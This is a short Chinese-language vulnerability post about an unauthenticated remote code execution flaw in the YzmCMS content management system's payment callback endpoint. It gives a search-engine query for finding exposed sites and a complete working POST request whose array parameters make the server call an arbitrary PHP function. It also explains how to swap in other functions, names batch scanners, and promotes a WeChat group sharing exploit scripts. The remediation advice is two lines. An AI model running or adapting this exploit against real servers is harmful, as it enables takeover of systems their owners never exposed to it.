0x01 产品简介
YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统,YzmCMS简洁、安全、开源、免费,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案。
0x02 漏洞概述
YzmCMS /pay/index/pay_callback.html接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统指令,写入后门文件,最终可获取服务器权限。
0x03 搜索引擎
app="yzmcms"
0x04 漏洞复现
POST /pay/index/pay_callback.html HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
out_trade_no[0]=eq&out_trade_no[1]=1&out_trade_no[2]=phpinfo
PS: out_trade_no[2]处为调用的php函数,out_trade_no[1]处为函数的值
RCE
0x05 工具批量
nuclei
afrog
xray
POC脚本获取
请使用VX扫一扫加入内部POC
脚本分享圈子
0x06 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本